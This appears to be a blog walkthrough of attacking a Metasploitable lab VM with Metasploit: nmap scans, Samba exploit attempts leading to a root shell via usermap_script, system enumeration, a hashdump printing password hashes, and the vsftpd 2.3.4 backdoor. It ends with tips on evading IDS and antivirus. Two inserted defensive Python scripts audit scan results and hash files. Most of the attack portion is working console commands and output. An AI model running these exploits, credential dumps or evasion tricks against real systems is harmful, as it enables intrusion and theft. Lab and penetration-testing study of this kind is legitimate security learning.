
Exploiting machines using Metasploit

Metasploit is a powerful tool for exploiting vulnerabilities on remote hosts. Metasploit allows you to trivially run an exploit on a host to execute a payload. I will take a look at some basics of Metasploit and use it to exploit some vulnerabilities in a Metasploitable VM.

Start the Metasploit framework from Kali; you will find it under Applications -> Exploitation Tools. Checking the version from the console:

msf > version
Framework: 4.11.5-2015121501
Console  : 4.11.5-2015121501.15168

I can execute relevant Linux commands from within the msf console.

msf > ifconfig
[*] exec: ifconfig

eth0      Link encap:Ethernet  HWaddr 00:0c:29:fa:df:2f  
          inet addr:192.168.238.136  Bcast:192.168.238.255  Mask:255.255.255.0
...

I can also use other tools within the msf console.

msf > nmap -sn 192.168.238.0/24
[*] exec: nmap -sn 192.168.238.0/24

Starting Nmap 6.49BETA5 ( https://nmap.org ) at 2016-01-05 18:13 EST
Nmap scan report for 192.168.238.1
Host is up (0.00044s latency).
MAC Address: 00:50:56:C0:00:08 (VMware)
Nmap scan report for 192.168.238.2
Host is up (0.000050s latency).
MAC Address: 00:50:56:E9:39:5C (VMware)
Nmap scan report for 192.168.238.131
Host is up (0.00049s latency).
MAC Address: 00:0C:29:54:6E:48 (VMware)
Nmap scan report for 192.168.238.254
Host is up (0.00011s latency).
MAC Address: 00:50:56:FF:4C:2F (VMware)
Nmap scan report for 192.168.238.136
Host is up.
Nmap done: 256 IP addresses (5 hosts up) scanned in 1.79 seconds

msf > nmap -sV 192.168.238.131
[*] exec: nmap -sV 192.168.238.131


Starting Nmap 6.49BETA5 ( https://nmap.org ) at 2016-01-05 18:30 EST
Nmap scan report for 192.168.238.131
Host is up (0.00014s latency).
Not shown: 977 closed ports
PORT     STATE SERVICE     VERSION
21/tcp   open  ftp         vsftpd 2.3.4
22/tcp   open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
23/tcp   open  telnet      Linux telnetd
25/tcp   open  smtp        Postfix smtpd
53/tcp   open  domain      ISC BIND 9.4.2
80/tcp   open  http        Apache httpd 2.2.8 ((Ubuntu) DAV/2)
111/tcp  open  rpcbind     2 (RPC #100000)
139/tcp  open  netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
512/tcp  open  exec        netkit-rsh rexecd
513/tcp  open  login?
514/tcp  open  tcpwrapped
1099/tcp open  rmiregistry GNU Classpath grmiregistry
1524/tcp open  shell       Metasploitable root shell
2049/tcp open  nfs         2-4 (RPC #100003)
2121/tcp open  ftp         ProFTPD 1.3.1
3306/tcp open  mysql       MySQL 5.0.51a-3ubuntu5
5432/tcp open  postgresql  PostgreSQL DB 8.3.0 - 8.3.7
5900/tcp open  vnc         VNC (protocol 3.3)
6000/tcp open  X11         (access denied)
6667/tcp open  irc         Unreal ircd
8009/tcp open  ajp13       Apache Jserv (Protocol v1.3)
8180/tcp open  http        Apache Tomcat/Coyote JSP engine 1.1
MAC Address: 00:0C:29:54:6E:48 (VMware)
Service Info: Hosts:  metasploitable.localdomain, localhost, irc.Metasploitable.LAN; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.06 seconds
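As an added example (not from the original post), here is a small Python script that turns the nmap -sV table above into a service inventory and flags what a defender should act on first: the vsftpd 2.3.4 banner, which the walkthrough later shows to be a backdoored release, and the legacy cleartext or unauthenticated services (telnet, rexec, rlogin, the root shell on port 1524). The sample input is a constructed subset of the scan output above; the risk labels are my own.

```python
import re
from dataclasses import dataclass

# Constructed sample: a subset of the nmap -sV output shown above.
SCAN = """\
PORT     STATE SERVICE     VERSION
21/tcp   open  ftp         vsftpd 2.3.4
22/tcp   open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
23/tcp   open  telnet      Linux telnetd
139/tcp  open  netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
512/tcp  open  exec        netkit-rsh rexecd
513/tcp  open  login?
1524/tcp open  shell       Metasploitable root shell
3306/tcp open  mysql       MySQL 5.0.51a-3ubuntu5
"""

# One row of the PORT/STATE/SERVICE/VERSION table; VERSION may be empty.
PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)\s*(.*)$")

@dataclass
class Service:
    port: int
    proto: str
    state: str
    name: str
    version: str

def parse_nmap_sv(text: str) -> list:
    """Parse the port table of `nmap -sV` output into Service records."""
    services = []
    for line in text.splitlines():
        m = PORT_RE.match(line)
        if m:
            port, proto, state, name, version = m.groups()
            # nmap appends '?' when the service guess is uncertain.
            services.append(Service(int(port), proto, state, name.rstrip("?"), version.strip()))
    return services

# Banner the walkthrough above demonstrates is exploitable, and legacy
# cleartext/unauthenticated services that should not be exposed at all.
KNOWN_BAD_VERSIONS = {"vsftpd 2.3.4": "backdoored release, gives a pre-auth root shell"}
LEGACY_SERVICES = {"telnet", "exec", "login", "shell"}

def review(services) -> list:
    """Return (port, severity, reason) findings for open services, sorted by port."""
    findings = []
    for s in services:
        if s.state != "open":
            continue
        for banner, why in KNOWN_BAD_VERSIONS.items():
            if s.version.startswith(banner):
                findings.append((s.port, "critical", f"{banner}: {why}"))
        if s.name in LEGACY_SERVICES:
            findings.append((s.port, "high", f"legacy cleartext/unauthenticated service '{s.name}' exposed"))
    return sorted(findings)
```

Note that nmap only reports "Samba smbd 3.X" here; the exact Samba version (3.0.20-Debian) surfaces later, in the exploit module's own output, so version-based triage from a scan alone is incomplete.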

I will try to gain shell access by exploiting Samba. Metasploitable has two Samba ports open: port 139 and port 445. Port 445 runs SMB directly over TCP, while port 139 runs SMB over NetBIOS over TCP.

I can search for exploits in the database using the search command:

msf > search Samba

Matching Modules
================

   Name                                            Disclosure Date  Rank       Description
   ----                                            ---------------  ----       -----------
   auxiliary/admin/smb/samba_symlink_traversal                      normal     Samba Symlink Directory Traversal
   auxiliary/dos/samba/lsa_addprivs_heap                            normal     Samba lsa_io_privilege_set Heap Overflow
   auxiliary/dos/samba/lsa_transnames_heap                          normal     Samba lsa_io_trans_names Heap Overflow
...

The results show the name of the module, when the vulnerability was disclosed, a ranking of the exploit (based on the stability of the exploit and its range of targets), and a description including the affected OS and service versions.
Metasploit also offers a grep command, which gives more search flexibility at the cost of formatting:

msf > grep -i samba search
   auxiliary/admin/smb/samba_symlink_traversal                                               normal     Samba Symlink Directory Traversal
   auxiliary/dos/samba/lsa_addprivs_heap                                                     normal     Samba lsa_io_privilege_set Heap Overflow
   auxiliary/dos/samba/lsa_transnames_heap                                                   normal     Samba lsa_io_trans_names Heap Overflow
   auxiliary/dos/samba/read_nttrans_ea_list                                                  normal     Samba read_nttrans_ea_list Integer Overflow
   auxiliary/scanner/smb/smb_uninit_cred                                                     normal     Samba _netr_ServerPasswordSet Uninitialized Credential State
   exploit/freebsd/samba/trans2open                                         2003-04-07       great      Samba trans2open Overflow (*BSD x86)
   exploit/linux/samba/chain_reply                                          2010-06-16       good       Samba chain_reply Memory Corruption (Linux x86)

I’ll be limited to exploits against Linux, since my only target is Metasploitable. I’m going to just pick one at random and go from there.

msf > use exploit/linux/samba/lsa_transnames_heap
msf exploit(lsa_transnames_heap) > show options

Module options (exploit/linux/samba/lsa_transnames_heap):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOST                     yes       The target address
   RPORT    445              yes       Set the SMB service port
   SMBPIPE  LSARPC           yes       The pipe name to use


Exploit target:

   Id  Name
   --  ----
   0   Linux vsyscall

RHOST is the target of the attack.

msf exploit(lsa_transnames_heap) > set RHOST 192.168.238.131
RHOST => 192.168.238.131

I will start with a simple exploit to get a shell on the target.

msf exploit(lsa_transnames_heap) > set payload linux/x86/shell/bind_tcp
payload => linux/x86/shell/bind_tcp
msf exploit(lsa_transnames_heap) > show options

Module options (exploit/linux/samba/lsa_transnames_heap):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOST    192.168.238.131  yes       The target address
   RPORT    445              yes       Set the SMB service port
   SMBPIPE  LSARPC           yes       The pipe name to use


Payload options (linux/x86/shell/bind_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LPORT  4444             yes       The listen port
   RHOST  192.168.238.131  no        The target address


Exploit target:

   Id  Name
   --  ----
   0   Linux vsyscall

It looks like Metasploit has all the information it needs.

msf exploit(lsa_transnames_heap) > exploit

[*] Started bind handler
[*] Creating nop sled....
[*] Trying to exploit Samba with address 0xffffe410...
[*] Connecting to the SMB service...
[-] Exploit aborted due to failure: no-target: This target is not a vulnerable Samba server (Samba 3.0.20-Debian)
[*] Exploit completed, but no session was created.

The exploit didn’t work. Trying the next exploit:

msf exploit(lsa_transnames_heap) > use exploit/linux/samba/setinfopolicy_heap
msf exploit(setinfopolicy_heap) > show options

Module options (exploit/linux/samba/setinfopolicy_heap):

   Name        Current Setting  Required  Description
   ----        ---------------  --------  -----------
   RHOST                        yes       The target address
   RPORT       445              yes       Set the SMB service port
   StartBrute                   no        Start Address For Brute Forcing
   StopBrute                    no        Stop Address For Brute Forcing


Exploit target:

   Id  Name
   --  ----
   0   2:3.5.11~dfsg-1ubuntu2 on Ubuntu Server 11.10

I need to reset the RHOST and payload when trying a new exploit.

msf exploit(setinfopolicy_heap) > set RHOST 192.168.238.131
RHOST => 192.168.238.131
msf exploit(setinfopolicy_heap) > set payload linux/x86/shell/bind_tcp
payload => linux/x86/shell/bind_tcp
msf exploit(setinfopolicy_heap) > exploit

[*] Started bind handler
[*] Trying to exploit Samba with address 0xb67f1000...
[-] Server is most likely patched...
[*] Trying to exploit Samba with address 0xb67f2000...
[-] Server is most likely patched...
[*] Trying to exploit Samba with address 0xb67f4000...
[-] Server is most likely patched...
^C[-] Exploit failed: Interrupt 
[*] Exploit completed, but no session was created.

This exploit didn’t work either. Trying another:

msf exploit(setinfopolicy_heap) > use exploit/multi/samba/usermap_script
msf exploit(usermap_script) > show options

Module options (exploit/multi/samba/usermap_script):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   RHOST                   yes       The target address
   RPORT  139              yes       The target port


Exploit target:

   Id  Name
   --  ----
   0   Automatic
msf exploit(usermap_script) > set RHOST 192.168.238.131
RHOST => 192.168.238.131
msf exploit(usermap_script) > exploit

[*] Started reverse double handler
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo ciZ6DcyeZcCJsNkV;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "ciZ6DcyeZcCJsNkV\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 1 opened (192.168.238.136:4444 -> 192.168.238.131:33372) at 2016-01-05 19:49:21 -0500

Success! I have a shell on the target. Pressing CTRL+Z backgrounds the session so I can keep working in the console.

^Z
Background session 1? [y/N]  y
msf exploit(usermap_script) >

The usermap_script exploit takes advantage of a command execution vulnerability in Samba's handling of the username field. Since the username is supplied before authentication, this exploit requires no credentials at all!

At this point, there are two directions to take: payloads or post-exploitation scripts.

Metasploit offers over 200 payloads, but not every payload is compatible with every exploit. Most payloads simply open a reverse shell back to Metasploit, but a few unique ones can add and edit files and users, change file permissions, perform DLL injection, or load Meterpreter. Meterpreter is by far the coolest payload Metasploit offers: it resides solely in memory (to leave no trace on disk), injects its code into DLLs (so as not to spawn any processes), and all communication with Meterpreter is encrypted.
Once you get Meterpreter running on a machine, it is totally pwnd. Meterpreter gives you a whole environment on the infected machine that lets you run commands, capture screenshots of the desktop, view the webcam, move the mouse, and capture keyboard input. Since Meterpreter runs only in memory, it will be gone once the machine restarts. It would be best to backdoor the machine.

Post-exploitation scripts allow us to gather information, pivot to other machines, sniff the network, set up a backdoor, and so on.

msf exploit(usermap_script) > search post/linux/gather

Matching Modules
================

   Name                                     Disclosure Date  Rank    Description
   ----                                     ---------------  ----    -----------
   post/linux/gather/checkvm                                 normal  Linux Gather Virtual Environment Detection
   post/linux/gather/ecryptfs_creds                          normal  Gather eCryptfs Metadata
   post/linux/gather/enum_configs                            normal  Linux Gather Configurations
   post/linux/gather/enum_network                            normal  Linux Gather Network Information
   post/linux/gather/enum_protections                        normal  Linux Gather Protection Enumeration
   post/linux/gather/enum_psk                                normal  Linux Gather 802-11-Wireless-Security Credentials
   post/linux/gather/enum_system                             normal  Linux Gather System and User Information
...

I will use a script to gather information from the machine.

msf exploit(usermap_script) > use post/linux/gather/enum_system

I still have the session backgrounded earlier, which I can list with the following command.

msf post(enum_system) > sessions -l

Active sessions
===============

  Id  Type        Information  Connection
  --  ----        -----------  ----------
  1   shell unix               192.168.238.136:4444 -> 192.168.238.131:33372 (192.168.238.131)
msf post(enum_system) > show options

Module options (post/linux/gather/enum_system):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION                   yes       The session to run this module on.

msf post(enum_system) > set SESSION 1
SESSION => 1
msf post(enum_system) > exploit

[+] Info:
Login with msfadmin/msfadmin to get starteded network!                     ____  
[+]     Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux
[+]     Module running as "root" user
[*] Linux version stored in /root/.msf5/loot/20160105212135_default_192.168.238.131_linux.enum.syste_273307.txt
[*] User accounts stored in /root/.msf5/loot/20160105212135_default_192.168.238.131_linux.enum.syste_703384.txt
[*] Installed Packages stored in /root/.msf5/loot/20160105212135_default_192.168.238.131_linux.enum.syste_304431.txt
[*] Running Services stored in /root/.msf5/loot/20160105212135_default_192.168.238.131_linux.enum.syste_305863.txt
[*] Cron jobs stored in /root/.msf5/loot/20160105212135_default_192.168.238.131_linux.enum.syste_807045.txt
[*] Disk info stored in /root/.msf5/loot/20160105212135_default_192.168.238.131_linux.enum.syste_687962.txt
[*] Logfiles stored in /root/.msf5/loot/20160105212135_default_192.168.238.131_linux.enum.syste_837062.txt
[*] Setuid/setgid files stored in /root/.msf5/loot/20160105212135_default_192.168.238.131_linux.enum.syste_887699.txt
[*] Post module execution completed

There’s a lot of intel in these files. I want to try and gather some password hashes.

msf post(enum_system) > use post/linux/gather/hashdump
msf post(hashdump) > show options

Module options (post/linux/gather/hashdump):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION                   yes       The session to run this module on.

msf post(hashdump) > set session 1
session => 1
msf post(hashdump) > exploit

[+] root:$1$/avpfBJ1$x0z8w5UF9Iv./DR9E9Lid.:0:0:root:/root:/bin/bash
[+] sys:$1$fUX6BPOt$Miyc3UpOzQJqz4s5wFD9l0:3:3:sys:/dev:/bin/sh
[+] klog:$1$f2ZVMS4K$R9XkI.CmLdHhdUE3X9jqP0:103:104::/home/klog:/bin/false
[+] msfadmin:$1$XN10Zj2c$Rt/zzCW3mLtUWA.ihZjA5/:1000:1000:msfadmin,,,:/home/msfadmin:/bin/bash
[+] postgres:$1$Rw35ik.x$MgQgZUuO5pAoUvfJhfcYe/:108:117:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash
[+] user:$1$HESu9xrH$k.o3G93DGoXIiQKkPmUgZ0:1001:1001:just a user,111,,:/home/user:/bin/bash
[+] service:$1$kR3ue7JZ$7GxELDupr5Ohp6cjZ3Bu//:1002:1002:,,,:/home/service:/bin/bash
[+] Unshadowed Password File: /root/.msf5/loot/20160105212317_default_192.168.238.131_linux.hashes_446028.txt
[*] Post module execution completed
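Every hash dumped above starts with $1$, which is md5crypt. As an added example (not from the original post), this Python script parses the unshadowed passwd format that hashdump writes, classifies each hash by its crypt prefix, and reports what an administrator reviewing such a file should fix first: weak or empty password hashes and extra uid-0 accounts. The input lines are constructed placeholders in the same format, not the hashes from the target.

```python
from dataclasses import dataclass

# Constructed sample in the unshadowed passwd format printed by hashdump
# above; the hash values are made-up placeholders of the right shape.
UNSHADOWED = """\
root:$1$aaaaaaaa$bbbbbbbbbbbbbbbbbbbbbb:0:0:root:/root:/bin/bash
sys:*:3:3:sys:/dev:/bin/sh
backup:$1$cccccccc$dddddddddddddddddddddd:0:0:backup:/root:/bin/bash
alice:$6$eeeeeeeeeeeeeeee$ffffffffffffffffffffff:1001:1001:Alice,,,:/home/alice:/bin/bash
daemon:!:1:1:daemon:/usr/sbin:/bin/false
"""

# crypt(3) prefix -> (scheme name, considered weak today?)
SCHEMES = {
    "$1$": ("md5crypt", True),     # fast, fixed 1000 rounds: cheap to brute-force
    "$2a$": ("bcrypt", False), "$2b$": ("bcrypt", False), "$2y$": ("bcrypt", False),
    "$5$": ("sha256crypt", False),
    "$6$": ("sha512crypt", False),
    "$y$": ("yescrypt", False), "$7$": ("yescrypt", False),
}

@dataclass
class Account:
    name: str
    hash: str
    uid: int
    gid: int
    shell: str

def parse_unshadowed(text: str) -> list:
    """Parse name:hash:uid:gid:gecos:home:shell lines into Account records."""
    accounts = []
    for line in text.splitlines():
        if not line.strip():
            continue
        f = line.split(":")
        if len(f) != 7:
            raise ValueError(f"malformed passwd line: {line!r}")
        accounts.append(Account(f[0], f[1], int(f[2]), int(f[3]), f[6]))
    return accounts

def classify_hash(h: str) -> tuple:
    """Return (scheme, weak) for a crypt(3) hash field."""
    if h == "":
        return ("empty", True)          # no password at all
    if h.startswith(("*", "!")):
        return ("locked", False)        # account cannot log in with a password
    for prefix, (name, weak) in SCHEMES.items():
        if h.startswith(prefix):
            return (name, weak)
    return ("descrypt/unknown", True)   # 13-char DES crypt or anything unrecognised

def audit(accounts) -> list:
    """Return (account, reason) findings in file order."""
    findings = []
    for a in accounts:
        scheme, weak = classify_hash(a.hash)
        if weak:
            findings.append((a.name, f"weak or missing password hashing: {scheme}"))
        if a.uid == 0 and a.name != "root":
            findings.append((a.name, "extra uid-0 account, possible backdoor"))
    return findings
```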

For fun, I’ll exploit another service. Metasploitable is running vsftpd, so I’ll search for exploits.

msf post(hashdump) > search vsftp

Matching Modules
================

   Name                                  Disclosure Date  Rank       Description
   ----                                  ---------------  ----       -----------
   exploit/unix/ftp/vsftpd_234_backdoor  2011-07-03       excellent  VSFTPD v2.3.4 Backdoor Command Execution


msf post(hashdump) > use exploit/unix/ftp/vsftpd_234_backdoor
msf exploit(vsftpd_234_backdoor) > show options

Module options (exploit/unix/ftp/vsftpd_234_backdoor):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   RHOST                   yes       The target address
   RPORT  21               yes       The target port


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf exploit(vsftpd_234_backdoor) > set RHOST 192.168.238.131
RHOST => 192.168.238.131
msf exploit(vsftpd_234_backdoor) > exploit

[*] Banner: 220 (vsFTPd 2.3.4)
[*] USER: 331 Please specify the password.
[+] Backdoor service has been spawned, handling...
[+] UID: uid=0(root) gid=0(root)
[*] Found shell.
[*] Command shell session 2 opened (192.168.238.136:40469 -> 192.168.238.131:6200) at 2016-01-05 21:44:56 -0500

^Z
Background session 2? [y/N]  y

This gives a second session.

msf exploit(vsftpd_234_backdoor) > show sessions

Active sessions
===============

  Id  Type        Information  Connection
  --  ----        -----------  ----------
  1   shell unix               192.168.238.136:4444 -> 192.168.238.131:55821 (192.168.238.131)
  2   shell unix               192.168.238.136:40469 -> 192.168.238.131:6200 (192.168.238.131)

While Metasploit is an amazingly simple tool to use, one should be mindful of what's going on under the hood to avoid the "script kiddie" moniker. Some things to keep in mind:

  • A decently tuned IDS will probably see you exploiting the service over the wire. Metasploit offers alternate methods of transporting over the wire, as well as different encoding schemes and fragmentation (note: encoding is NOT a good way of avoiding AV). Using an encrypted channel will also render the attack invisible.
  • Depending on the exploit or the payload, antivirus may catch on and mark your payload as malicious. DLL injection is an obvious way of avoiding AV because AV only scans the disk, but some exploits require disk writes. When injecting a payload into another process, Metasploit uses a default executable template which is easily detected by AV, regardless of the presence of a payload. If the target has any sort of AV, it is a good idea to change the executable template.

I’m sure I’ll be doing some more advanced attacks with Metasploit later to show off some more features.